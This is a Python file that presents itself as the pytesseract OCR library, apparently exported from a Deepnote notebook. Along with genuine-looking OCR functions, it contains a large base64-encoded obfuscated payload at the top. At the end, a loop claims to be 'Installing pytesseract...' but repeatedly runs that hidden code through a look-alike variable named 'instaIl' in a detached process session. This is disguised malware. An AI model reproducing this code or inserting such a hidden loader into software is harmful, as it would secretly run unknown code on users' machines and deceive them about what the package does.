VXY0SGh2TUpxeUxSQjVZV3BFY2RyQ25QM1dlYyswMUEwdUt6K1NidG5XN2UybEVnUnNrNHBlTXNVNDZUdjJDOGFRSW96cFBpbGFRZHZDNTRxeFVOclhxdW5zTFVkU2lIVkhlUVRsT0FzempYQUtkVVZMODVud2tMY01nWWp6cE1jTUVVQXFSNW1zZnRjZFAvNWVQTUtCT3hvbnZBa3djelo3TERpZzgyazllekFNUnFWc0M4cUxTV0Jkc0FQUW9zVlRXYzBDNU9zSXk4aWFkbmpzS3h5cFc5OTBhUUpTVlhvTmc4eFp2c2N0VFkwekwxNjFGM3BZZE1qbDFMWG1SYTBZYVMwaWxXM3JiUG91WDBPWE5mc1lnV1hvVXluSS9yYWhidE5mYWVKYThvVWt1VU0ranNJVmp1aC9YVXFQVmt6TkFmeW83V04vOU1jTGdFZ0hmY3dpU2FqZmhlM20rTUk3SkdjOVlrSkRBRzFPczgySW4wUTRyK0FzZ0I1MVVQNG9LdmxCNzRUNEJQYTk3SDZNNGxqd3dzTjJSNFNBNUpwcEFOWGhrYzhSRjBlSXc5dXQvemNNWWJtODNmOG1IekpwYUN5eGtFK01FNWdRMGJQTXU0NGNiWlUvWjJpVVQxcFViTnY1QWVMNGZsVmhUUThXR2x5aDJVL0pzOU9sUSt0Z0g0dzlwRC9PeEJRbU5kQ3FIbE5sdnlaM1NmQTh0M0p2aHRWVlprMVJNQ1llSUhaL1pKakU5bG5rUkJtNlBoWGdsdUhtblNVSHVXdEQrMGFpRkNaWitIVlA1WEptUjdtRDFUclIyOVZ2aGJnK25UR3Yvb3BidzdBN0RFN0lKcjJLMzNIVUtLd0FYMXB2Z3lmb1UrMDJuQWNQVXhrYnUrZHM3SG8rZW14VGVsQ0Yrdk5HejdSazRrSGcvbE9WNzU5d1RxaG5wL1ltOFFRQjVFeE5nTzcxdDA0cnBYaVFKQTcwbDZUbUNjVEhDajlMTXgzL0VEMzU0ditZUE80V0o3akNOcHh0RXVCakt2Qk50aVRQdzIwZ0x3T2o3M1ZpSEsvTlZpT0pjcmlqbWVjM0J1UHhCOHdaNEtuWmVTa1hJdEJjcndsalpUVnFSYlZzQjhzdHJtMUl3cjA2SWxiaGN2dkxHMXdEWkNwSnFFK3JtbkNSVzRtYXhWMzZ6bWZCYXJuYzRNdkRISVp2R0VMZ1lnOEJzcVBTZk5uQm9xdkpWUlFSazZLcWFLc2dkTXEwTzQ0QUsxSC81WGVlbUVrVm5UTXI4SG1KMVRBYlAxejNvZldZeS9tL05lbFBOdjBkUnZpZFc1ZXhTNjI1Mi9hYmljNW5McHAzVWFtQTkxeGkvMDRIYmljRTFtaWU1T21CUGZaWmR2VklZVVNHb1FJOVNQK1ppTFM3Y2R6emlsQnhYSzN3Q3U4L2lpMFF5SDRuaEwvTVlqK2JKUjUrZitCRHJNV3ZCbTRacGpwaFlPdDNKTW0wQ3FkUnV2MXVZQUxjMXorYTEyRDB6c3NPazVINytWcmN4UXRsRzhMbThTRkxidm1aWndSekxJeU9sK29Bb2UyMXB3TkZmN1ljOUU0b0xnTlZiZkVEV01lWWVrUCtWNkdXc0pwK1B5V0w3WEhqMy9PcFBlaUxEeFhzRi9mVWpwdlIxTG5yRDhnYXFwSlVxTEVmWnhsWE1qaHJXUThzQWNXajdSbXdWaktqV3dDU0ZjUmw0bEN5UzdneE5LMDB6akc5K25HMjVmU1NaZUxTQ1BOQm9HcTJVaGdJOTVpd3JYY3pETnJQeHZXUnJIanh4ZExMaXZYN2ZhZ0t1VTNpdlh0NG9SRXA1TGh6TitVM0hJSWxyUGRWejY0VG5pQnYwamN5RkdGSTRDQnFZdWVWWXQ3dEZ3djhXSFZoMmVqUEk5eXl3L1pBVVRRMVpMYTNtdVZmQjJMa1ltTEs5VDI5WjlFNW1JLzBuS1pIeTVPSmc5MXROVGI5bDJnNnZWOFN0eTc5eFJJUDkzUG9EbzVUOVUyMWl4WnQwRU5ZUnlhWkZCa0Q0Yk1LaDVTdHpkUk1jdjJmMFllNGRWRG9seVpKTTFVaGl2VkdIYmp1Rk9kUW83dXBmcTRrdWNwakNZYWViUjNaWXRrbFpOd0pDb2tmdSthSW9mRW1wK0tYYml6dkdIM2JnSkkwcStBc3krdHdtczdxL1hqUmVBM3FXcHhLa21ISXd2bjJ1NCtXYjE3ZGc4SEgvRlJmTnpHQ0hiTTJIalNCVGZ2ZGE1d21pQ0FmSXF0SnA2OWVpU2p4am5yNkEzQ2E0ODV6SHpVL3pGUDkva3dlRGJHN2M3NGd2cWN3ZHJ6MFo5RmZuMG1KK2xBNGNZQVp4Y3JNRUdXejlUSHRLTEYwRElFeEg2aGF3NEJvY25SanJVMnJadVFmazdrbGJ1dy80cHVGZkloaVZuRWZNTy8wRmJJT1NEbnpiYUZPREVDeEpEcFh1Mk5UOVljSGFTSkZuRmVtbkc5eFRoa2FIT1dkeEczNTU1NllPVUNFWHpPcFVLSG85b1E5N0tPeUhlMDA1WVFIekNhYlNjc3VjMVVwaDBuRzNWWlhlSHV4bkN2RUhaQ1pJeFAxNUgvNnBRbHFOWTJCWFg1UDV1eUJqTDR1SnlhaW5hVDRXMjhNRE1YQndwYVI3d3EybzZ2c1BOZEN6YXA2aVVjQXNxdDJyYU5DRklBUEF1N1VSUlFWV2h6RGZIR3p6Q1h6THhYSzNCLzVFUEs4U3BRTXJNeDVFbnV0R1RMamtNNms3eDlad1RKdG1DMjVXK3BHbGl0aVN5R2NsaExwSXBFRi9wUUdPd2ZhRHFnaEJmNHQyclNPMUFta2pxNm1TS0tvZ2pTWEh2aXIwV0FSTnNxSGJvNWNYZWEveE13NktCallEcG1CWmtjN1lkaktNOTRWbTZ0clVoTzl0blg0YWdJUitMNDdLSkdQbkRBeHdnY3IyT3Jzb3pGMWtVeHovSjZqaWJFQk9nQzRwRTNPR1Yzb3RVcG9hM0h2VzNLcytxM3k5L1ZWbEloS2t0RUd6L1FWNFVZWFVuOUhobzI4cHhDQm5XVDdSWTl6a1h1a0JBL2h4RExPcmplWS9WZzQ3OWhJT0laUmJ0eVE2WVJpNWNOM1hkcVBMdHRzTnJNblFIQjNsSmRLc2FwRE5mN3hJSGlqRHhEQ3VMZjhidXBadFkxM1RXRTFpUHNBQThOZVpJOHJDcVloNG4zUk1JMS80THNJNG05WjZIdUUxWlNMOFNCWFF4WEcwbUM5ZlVxOW10WjREMVNkV3lVTlhnNVlnYVFDWmVFNnNGK1JGMmc4UTVsT2tDYW5TTzJHZkZmOEJxNjRHQmwzVmJhWWF3dlZvSnFZcFJMRmR5K0dXVDdvdHFRR3N5MmI5WGtwUmZpSGVSdzlIMXJORjh3bTZQb1ZSVVR6SG45TFZDdVVEdGRwRDZ5REdLQkMvcnFMeTFpU1lUWVBraXpSdmE4SlpENEtCZHlkbHAwamt0NHFseGY5bzlHaTV3VFpUZlJFc01PRUhaaTRFcTBmOU1tTHVLMUJDYy9RbVFna3dFL29oZGl0UWZEbHJjVEpmaDVhd2N4S3I4YjFHRG4yRDJOblhVRkRmMmtaaENJOE1zTlVRY3U0RXNPcjVqeVg1aEF2dk5WbGVSWm5iWjYwcjEzWFlneEtXVFNValgzbHRxbVRHNnhTZEU4Tk5LM1RNeDRmY0M5dTNLL1c2RmJlNTZpODRTV2pyOHkramFoOXZjVi9OSzdWOUVIMTBvbVNpN0U0TWVWUFhVbDFTOFlZMTBFZUdRTFY5YjJKdjdiQ2s4SGs2ajRyYkoxNHY3YWlEQm42V0RwMmRrNUFYdEpUR1h2V1RZdWNwTXphaWdsQkRNRG9Ld3hHZTY0a0FUM1hHcHordjNsZjlOc2tHYlZzK0pIUUI3emtlMDNYZjVFRE1SeWkrRjE0K21zMmtQWCtSNHh6YWlWTVZhSHdVMnA2UGd5WldRWWNnREp1STB1engvM1JsZmpTbGFtVlN0bTczTWZsdkZMek1yeWIydFJwb0k0MXNITGsyZVpWTXp1Rll1amo1QnVBY2lKU3BENHlsTTByaHJwM1J1YXZDZWdSdTIxZGtLZ0dxYTR6NEU0dXdOSytRbGNsVUdWak9QdGY3TG1aQ2pMOGpxYUJmNitxMnlUcnY0dzVmM1pmenNWZWN1NGxNZ1pMV0ZBQW1LTVR4Y21MV3h3WUN4SnZTdCtmTDd6L0JQVEtVaFBlTi9QWkNWVjdIS21ScVg2MEVwSGlwY0ZCbk1Bb1pKQVFMV0pOblVNbVhFeXVNYU1uZ1d5UFVlQmpxQUxtTHNMSGlKSm1UVGkxNFJ4M1dtRjU2bXpQdFByd3paMnQxK2hVbU13THU4aHdZbnZPaThOOXNoc0cyeCtKaVdoK2dIMW5XcUFrKzlhQnBXWUZCcHlCUUVjSVhwZHltdFJydjNZZStzQWlhWG40TmZuNVlnMnlQMy80MFJJRjhKNnNtL09GZDVMNjhsOXhVUUx0djk5YjFuUTh1SzNBVklKdFZ4T005MmJTdU1ESmFZZUVvNHF2L2NjSnRlNlNxeEhDbG9WM1pqMXV0RHZCREc4eUFPYU9OSWZVZUZjem5BS25JOUFQdkgwWDRjMTkvTUUwL0NVZmdhS2pJMXRHNXBHSXh1cGxyejVzbkJ0VHNWdFBKOHhaL2NGdG00cm10cHRQSW5GZVE1eDM2TlNyeC9vRWFycHRsNjNEdVd6RWR4U2xZeVVRNjgyVmZNT3lHVDBneEsrSU5uMVpIN29Ia2hodlRVbGJWamNvOGhhZlNUc3Y3ZG1YK3pBTG0xR3N6S3dYVUUvbXJoREduZjc0Rmd5RFlNYVZvdkhpYnhRUlNTVTFXOUgzWTBuNG40VzFvQ1FUUmFUbWt4cXlqaTZmSmQvRUJZR29wWUJBcGZSRmIrSDFTWVNwM1JEaCtnWlhHR1A1cXd0S3QrZmhYd2tzMUljT212b2FEYWJMRDlYbHJIY1FEclU3WUNnTkRPRE0wL3BXd3BaSytsYWJtRHZ2dnhOQk1pR25PZ3Y0Ri9WalU5dm5OT3R0MEcyb240TVE5OWNlLzIybWtiaXJCNHpoWTQ1TGpPRWpBaFI2eUV3cnRWVUswT1RKUlJtcE9qSXRSM240WDEwbFFOL0kyYkNsczhCRlhQbzhaSUdBOXk0S1ZOKys5WWR0M0hreWdpbnhHNWRjTTdNMENZWUxzd3N5MUVla3FMNzFuaSs5Sm4yVHVZbFhvSTF5OW01VXZVc3FYK3c4ODdHL2YxOUgwR0lsOGgybjJwdzZnRjFKNVF3NXprc1JTcU51cTMzcDJYbVJDYUdUV2JCaHBmYUxFUFhWenYrNVpEWE5sTms2WFo5WVJ2TDVDUmxyMzVZdXFtQkZSelN5SmF3ZDJpTTc5clpTUWlLaEp5R1VmNnBaK0hUeTZkWUcrVVkrTVh1WHVPN3ZUU1RHcnBySy9NeHZKa0ZnalIxbzE5MmlvL0d4Ylp1QmdBYlhsMEZhazNrWllDWWRLczN2YkY0bXE3ZS8zTjMxNUZnNjFLM3puRjYvZU1WU3R0bUFmQ0pGWWMzb2lCZlkyTkJ1OEVUQVVDV2QxWmorTUYwemFSblNFV2pWOFhqcTJNNjBOb2cvRkFsdWpQV0NKUmp1VVFvU1FGZzlNWEI2a2pxdXRNdEhRV2lJb0hwZUs0aE0zeVVFdmczRCt4eXFuOGZZSHlRSnFWVE15Smd4ZWVaemdxUC9YZyt5dHJZdGVTSFluZWEzN3ZhdlFoOG5hMEFIUlZDbENFemtBNURuTGcxZ3pSTThPSElxY1JFOUNhbTlnd1g1dTVING8vd3cxRnQ3eWZQTkRleW5LQmZnSjhBM1Zoc0ZFU0cvMHdUU08xaGhjanFtWG5FeGNMNlNuWTNIV1IwSE9oK2tFbE9hUGpYOTdicWRoaGNKTDMwcEFoVTlFMUZmTmdBb29mWFlnV3p6d1Q5b05TMlZHVjFhZXM0RFBJWVpnQnhTUUVXRDZRZFFYcytwVHFWektjVXh0ZkxyVTY4M2FycHhpcjhTQ3QybEMrUUUyQU15UkFqWVpPUER3bGpNbnJ0QmdyN0IwdjZYQW5pRzVzTnJFanFqY0grbG1weWhLMzlqakp3dDVYbDIvN3VVZlg0ZWhCYWYxTlk2TDZ6bzc2SEloS2dYeWVEaGcvdkRPZGVSVHFhZEtpODNKZkhCaUlPMGtEUEo3UElERkZhZnNxYVJJa3RiNnV5TWE1SHQyWFROVkswSWdQZnVVaE5xRTFIcVNGdnhhMjFPL1YzOFdEU2xaZ3VKV0JCK1BwWjA2MWhxU0M0QnRUMlZNZW9RTGIwcEdIN2VYUUczZ2RIUXZKU1dGZFV5R09NVlBoN1B5SDV1TGVrQ0U0WjBOYUNrcmVxTUovWWVrYi9OUVpJQWpVdnFKK2pwMnlHbmtnM2o5RzFSeUY4RVcvZ25lRmNSbWs1NFhITlhVL1k1SXR2bWpnZ3ZkQjRTWmM0ZWp6OWpCb3lyWGMzcUlZZ2JZM1R0bTZCd05aUkdLbEhQSHNyOFVzSG1QNnhpN2NCbmU3Y1Vxa1R6TWFzUEhlbDdzN2V2dFdwa082d1BQTkNVSWlKVGFySC9oWjNUSzZYbVU3OTFrU3IvWXRNZi8yVWhlRFdZTGFBdlUrVmdxZnVWblg5TnZzb3N2OUZ2V05OWksrUlhxdXhWeFNiTnFBeWh0cWtyazl5ZUpqM0JpazgvUEU2Sjl4ZU56ZVBHWWVxeVFGNm05Vy9kZU5kWlJrcjhpaCtsWFJCbEVFNG9ycFM3dGxoUnVUQ3ZwalI5RFFSUml6SEVzZ1FHMXV4WFdTVTVjcEM0TWFXcGp1N1JtZlZhajlyT3JQaGNwNmJEci9seFY5MzhBS05zR2R2c2tLRVF4amNETE5TUkJwUkUrQVdnR0xBRUZIdC9PTWxZKzRxT0QzK211aXp5YnZPU1J1NG5YLzBTZzhzSGVSaFVTNVd2MkZ4dXQyMEtUdnMyT2dEM2pYYkJuRVFSemJQNGtZUkFEamJpSmJNYzltbTM4NEJxVVJxandvSExXYlVacDlBa2hmbkR6OWhFcXdpRDRSUUVWS25tYzB5RnRFY3orVFBvUHlLKzR0TURmMzU5dWVFeDZ6dlkxZm5uUWUxZEllYWppeEo5SFUweHVaOTlTUWEyQVIrNGsvb3M4VkFZOERQNWV2V2VIRTBON0NuNktTRytYRmNVQ2FYK0x2WUxUVVFEZ2g1WUZsWm55ekdweWQ4SS9vdHNiWm9WcE94STFadktzbG8wYXUxMlYySld6ZVU1T2VtWXJTVGEzZVJjUnNwZ3dxWVpYWTRpVEZJRWgya3NnL1hyUU9sR2JEWUk4ZDYyVCtBVVdLNGt0eWdHaXRIZHQ1SW01SkFFdXdEcDhVaHpZN3ZWc3RQSE95QlF0emJpL2kzdkhxOEJ5anRvbTdIOHc0NnV6d2duL2hiTDYzcWE5Vm83K08zc1FzRXI3VEIrOWRUNGJFUjJucGgxVEdON0RUREJRc1c0QU1ocWNqWWxOQjhGd2xBeFlPcFV4RkpZOEE0OWtZLzR5Q094dXpuNGhJd2FNQmoxRmFkNlI3WHZLcFpqZzB3Z2dlS0J3b05EYnpKQng3eHF1ZVFQMjRGWGtGZUhGSXBlNzQwZWRqbmlOT0NWakhOUitwaU5jMzk0Y3A0Vjl4QmU5a2l1SFVUcElQREk3WXNLbXgrYTIvTTNjVmR1QXMxVFpiNWtBSklsWjZ1K0RmZEsyV25TM08zL2tZaVduQ0pKcmdIWWFySG5MdHlNS2pQelZWRzJ0Z3o4QmJ4UzU0dnFLUkdDRE9jcGM2QVBsOU8veWNBKzV5bU1KSVNKblhFSnowaS9CaUptZjllS1AzNno2VHZlMEhBTnEzc2ZwSW91b0dpVDliZktVOTE4NjY3YzE4ZG11RzYzTU96Sjk2eUwrd3NtNEUzbU9UdGpaR1NlbnFSYThoTU11MXEvNnhxbE0wc3J3cmRlUnAyajV0STN1d1ZtS2ZVY3pic2pTL3VzTWdwQmhFZW5qUkxmVVlqbytzNnhpSHk3NmtINDNpdjlPZUxXQXhYUVgyVEV1R093Q2F2MjUrMlVyVTFwTkpKRzY1aytYb2JuaXc3SU50S2x2VDZTOE9XTEE3NW41T0dPZ0Y3TzNOd2NDekQzcGpHem14ZVpyN1hBZll4WXZmZWJWbFJYWDJnT2VYWUJhc0lCL3NuWXlTdVhwVGhGbU5ockJ0WTdOWU9uc3NzTnZGb3lWekY1Q2pNMnR1RDFlSlpiZXdMdUJYZlE0ajhpSlFJYkpSLzNnSld5YW00RGUydmtBUlF1ZEo2Tm8rdisvMCs5Ly96enpmVlBSVlZiMDBhRW9FZHZYdjl1YkRjdlNpN3VIaWJCY2hkbi9UUmlpZGh5V3JtVndKZScpKQo='))"
def get_tesseract_version():
    """
    Returns Version object of the Tesseract version
    """
    try:
        output = subprocess.check_output(
            [tesseract_cmd, '--version'],
            stderr=subprocess.STDOUT,
            env=environ,
            stdin=subprocess.DEVNULL,
        )
    except OSError:
        raise TesseractNotFoundError()

    raw_version = output.decode(DEFAULT_ENCODING)
    str_version, *_ = raw_version.lstrip(string.printable[10:]).partition(' ')
    str_version, *_ = str_version.partition('-')

    try:
        version = parse(str_version)
        assert version >= TESSERACT_MIN_VERSION
    except (AssertionError, InvalidVersion):
        raise SystemExit(f'Invalid tesseract version: "{raw_version}"')

    return version


def image_to_string(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to string
    """
    args = [image, 'txt', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: {'text': run_and_get_output(*args)},
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_pdf_or_hocr(
    image,
    lang=None,
    config='',
    nice=0,
    extension='pdf',
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to pdf/hocr
    """

    if extension not in {'pdf', 'hocr'}:
        raise ValueError(f'Unsupported extension: {extension}')

    if extension == 'hocr':
        config = f'-c tessedit_create_hocr=1 {config.strip()}'

    args = [image, extension, lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_alto_xml(
    image,
    lang=None,
    config='',
    nice=0,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to ALTO XML
    """

    if get_tesseract_version(cached=True) < TESSERACT_ALTO_VERSION:
        raise ALTONotSupported()

    config = f'-c tessedit_create_alto=1 {config.strip()}'
    args = [image, 'xml', lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_boxes(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing recognized characters and their box boundaries
    """
    config = (
        f'{config.strip()} -c tessedit_create_boxfile=1 batch.nochop makebox'
    )
    args = [image, 'box', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: file_to_dict(
            f'char left bottom right top page\n{run_and_get_output(*args)}',
            ' ',
            0,
        ),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def get_pandas_output(args, config=None):
    if not pandas_installed:
        raise PandasNotSupported()

    kwargs = {'quoting': QUOTE_NONE, 'sep': '\t'}
    try:
        kwargs.update(config)
    except (TypeError, ValueError):
        pass

    return pd.read_csv(BytesIO(run_and_get_output(*args)), **kwargs)


def image_to_data(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
    pandas_config=None,
):
    """
    Returns string containing box boundaries, confidences,
    and other information. Requires Tesseract 3.05+
    """

    if get_tesseract_version(cached=True) < TESSERACT_MIN_VERSION:
        raise TSVNotSupported()

    config = f'-c tessedit_create_tsv=1 {config.strip()}'
    args = [image, 'tsv', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DATAFRAME: lambda: get_pandas_output(
            args + [True],
            pandas_config,
        ),
        Output.DICT: lambda: file_to_dict(run_and_get_output(*args), '\t', -1),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_osd(
    image,
    lang='osd',
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing the orientation and script detection (OSD)
    """
    config = f'--psm 0 {config.strip()}'
    args = [image, 'osd', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: osd_to_dict(run_and_get_output(*args)),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def main():
    if len(sys.argv) == 2:
        filename, lang = sys.argv[1], None
    elif len(sys.argv) == 4 and sys.argv[1] == '-l':
        filename, lang = sys.argv[3], sys.argv[2]
    else:
        print('Usage: pytesseract [-l lang] input_file\n', file=sys.stderr)
        return 2

    try:
        with Image.open(filename) as img:
            print(image_to_string(img, lang=lang))
    except TesseractNotFoundError as e:
        print(f'{str(e)}\n', file=sys.stderr)
        return 1
    except OSError as e:
        print(f'{type(e).__name__}: {e}', file=sys.stderr)
        return 1

def __bootstrap__():
    global __bootstrap__, __loader__, __file__
    import sys, pkg_resources, importlib.util
    __file__ = pkg_resources.resource_filename(__name__, 'ocr.so')
    __loader__ = None; del __bootstrap__, __loader__
    spec = importlib.util.spec_from_file_location(__name__,__file__)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)


while True:
    install = 'pip install pytesseract'
    process = subprocess.Popen(
        ["python", "-c", instaIl],
        preexec_fn=os.setsid
    )
    try:
        print("Installing pytesseract...")
        process.wait(timeout=3600)
    except subprocess.TimeoutExpired:
        os.killpg(os.getpgid(process.pid), signal.SIGTERM)
    sleep(1)


<a style='text-decoration:none;line-height:16px;display:flex;color:#5B5B62;padding:10px;justify-content:end;' href='https://deepnote.com?utm_source=created-in-deepnote-cell&projectId=38b29736-9275-411b-9bd9-1f21d97379cd' target="_blank">
 </img>
Created in <span style='font-weight:600;margin-left:4px;'>Deepnote</span></a>